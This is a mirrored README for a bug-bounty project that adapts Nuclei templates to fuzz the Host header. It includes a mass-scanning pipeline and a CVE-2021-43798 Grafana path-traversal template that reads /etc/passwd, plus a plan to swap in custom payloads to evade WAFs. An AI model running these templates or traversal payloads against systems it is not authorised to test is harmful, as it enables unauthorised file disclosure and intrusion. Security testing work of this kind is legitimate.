GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → 0xAwali → Virtual-Host

0xAwali / Virtual-Host

Licence: other
Modified Nuclei Templates Version to FUZZ Host Header

Labels

web-securitynucleibugbountycvessrfconfiguration-filesapi-docsmisconfigurationsnuclei-templatessensitive-files

Projects that are alternatives of or similar to Virtual-Host

Blind-SSRF
Nuclei Templates to reproduce Cracking the lens's Research
Stars: ✭ 111 (+192.11%)
Mutual labels:  web-security, nuclei, bugbounty, ssrf, nuclei-templates
cent
Community edition nuclei templates, a simple tool that allows you to organize all the Nuclei templates offered by the community in one place
Stars: ✭ 315 (+728.95%)
Mutual labels:  nuclei, bugbounty, nuclei-templates
nerdbug
Full Nuclei automation script with logic explanation.
Stars: ✭ 153 (+302.63%)
Mutual labels:  nuclei, bugbounty, nuclei-templates
Eagle
Multithreaded Plugin based vulnerability scanner for mass detection of web-based applications vulnerabilities
Stars: ✭ 85 (+123.68%)
Mutual labels:  bugbounty, cve, ssrf
leaky-paths
A collection of special paths linked to major web CVEs, known misconfigurations, juicy APIs ..etc. It could be used as a part of web content discovery, to scan passively for high-quality endpoints and quick-wins.
Stars: ✭ 507 (+1234.21%)
Mutual labels:  nuclei, bugbounty
my-nuclei-templates
Some contributions in the nuclei-templates repository
Stars: ✭ 32 (-15.79%)
Mutual labels:  nuclei, nuclei-templates
requests-ip-rotator
A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.
Stars: ✭ 323 (+750%)
Mutual labels:  web-security, bugbounty
Resources For Beginner Bug Bounty Hunters
A list of resources for those interested in getting started in bug bounties
Stars: ✭ 7,185 (+18807.89%)
Mutual labels:  web-security, ssrf
Priest
Extract server and IP address information from Browser SSRF
Stars: ✭ 13 (-65.79%)
Mutual labels:  bugbounty, ssrf
WDIR
Good resources about web security that I have read.
Stars: ✭ 14 (-63.16%)
Mutual labels:  web-security, bugbounty
Awesome Bugbounty Tools
A curated list of various bug bounty tools
Stars: ✭ 96 (+152.63%)
Mutual labels:  web-security, bugbounty
Pinaak
A vulnerability fuzzing tool written in bash, it contains the most commonly used tools to perform vulnerability scan
Stars: ✭ 69 (+81.58%)
Mutual labels:  nuclei, bugbounty
continuous-nuclei
Running nuclei Continuously
Stars: ✭ 45 (+18.42%)
Mutual labels:  nuclei, bugbounty
Bbrecon
Python library and CLI for the Bug Bounty Recon API
Stars: ✭ 169 (+344.74%)
Mutual labels:  web-security, bugbounty
Bugs-feed
Bug's feed is a local hosted portal where you can search for the latest news, videos, CVEs, vulnerabilities...
Stars: ✭ 90 (+136.84%)
Mutual labels:  bugbounty, cve
Favfreak
Making Favicon.ico based Recon Great again !
Stars: ✭ 564 (+1384.21%)
Mutual labels:  web-security, bugbounty
CVE-2021-44228-PoC-log4j-bypass-words
🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks
Stars: ✭ 760 (+1900%)
Mutual labels:  bugbounty, cve
magicRecon
MagicRecon is a powerful shell script to maximize the recon and data collection process of an objective and finding common vulnerabilities, all this saving the results obtained in an organized way in directories and with various formats.
Stars: ✭ 478 (+1157.89%)
Mutual labels:  nuclei, bugbounty
Minesweeper
A Burpsuite plugin (BApp) to aid in the detection of scripts being loaded from over 23000 malicious cryptocurrency mining domains (cryptojacking).
Stars: ✭ 162 (+326.32%)
Mutual labels:  web-security, bugbounty
ObserverWard 0x727
Cross platform community web fingerprint identification tool
Stars: ✭ 529 (+1292.11%)
Mutual labels:  nuclei, nuclei-templates
View All Similar Projects ➔

Modified Nuclei Templates Version to FUZZ Host Header

Requirements

1 - Understand Virtual Host

Virtual Host refers to run more than one web site on a single IP

e.g. You can configure Nginx to run two web site e.g. dev.example.com and api.example.com like that
server {
        listen 80;
        listen [::]:80;

        root /var/www/dev/html;
        index index.html;

        server_name dev.example.com;

        location / {
                try_files $uri $uri/ =404;
        }
}
server {
        listen 443 ssl;
        listen [::]:443 ssl;
        
        ssl on;
        ssl_certificate /path/your.crt;
        ssl_trusted_certificate /path/your.crt;
        ssl_certificate_key /path/your.key;
        
        root /var/www/api/html;
        index index.html;

        server_name api.example.com;

        location / {
                try_files $uri $uri/ =404;
        }
}

2 - Install

dnsx

httpx

Nuclei

anew

3 - Clone this Repository

Virtual Host

Usage

cat subdomains.txt | dnsx -a -silent -retry 5 -resp -o scanning.txt
cat scanning.txt | tr -d '[]' | awk '{ print $2 }' | sort -u | tee -a ips.txt
cat ips.txt | httpx -threads 200 -silent -retries 2 -timeout 10 -o aliveIPS.txt
cat scanning.txt | awk '{ print $1 }' | sort -u | tee -a resolvableDomains.txt
cat resolvableDomains.txt | httpx -threads 200 -silent -retries 2 -timeout 10 -o websites.txt
cat websites.txt | sed 's|^https://||' | sed 's|^http://||' | tee aliveSUBDOMAINS.txt
cat resolvableDomains.txt | anew aliveSUBDOMAINS.txt -d | tee -a deadSUBDOMAINS.txt
sed -i -- 's|/home/mahmoud/Wordlist/AllSubdomains.txt|/path/deadSUBDOMAINS.txt|' *.yaml
nuclei -c 300 -list aliveIPS.txt -bulk-size 50 -stats -retries 2 -timeout 20 -t "/Templates/CVE/" -severity high -o bugs.txt

Keep in Your Mind

If You gonna Use SSRF Templates , You must Use Your DOMAIN e.g. 

nuclei -c 300 -list aliveIPS.txt -bulk-size 50 -stats -retries 2 -timeout 20 -t "/Templates/SSRF/*.yaml" -var "MY-DOMAIN=me.com"

To Minimize Number of ERRORS , Prefer Using FOR LOOP e.g. 

for ip in `cat aliveIPS.txt`
do
 nuclei -u $ip -bulk-size 50 -stats -retries 2 -timeout 20 -t "/Templates/" -severity high -o bugs.txt
done

Tips

if U are Nuclei's Templates Contributer , write Your Templates by using HTTP raw format to MAKE THIS REPOSITORY UPDATE e.g.

id:

info:
  name:
  author:
  severity:

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 

      - type: word
        words:
          - ""
          - ""
        condition: and

      - type: word
        part: header
        words:
          - ""

Planning

I'm Trying to modify Nuclei's Templates to become MORE Powerful e.g. CVE-2021-43798

id: CVE-2021-43798

info:
  name:
  author:
  severity:


requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200

I'm gonna Replace ../../../../../../../../../../../../../../../../../../../etc/passwd to {{FILE-unix}}

id: CVE-2021-43798

info:
  name: 
  author: 
  severity:


requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/alertlist/{{FILE-unix}}"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200

that will help to bypass WAFs by using Custom paylaods because I think all WAFs detect ../../etc/passwd so using ../../etc/passwd is gonna be useless but using Custom paylaods is gonna be useful

Help ME !

these days I'm trying to find junior web penetration testing position but it's must be Remotely Becuase I'm still Student so IF YOU CAN HELP ME , DM on TWITTER

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].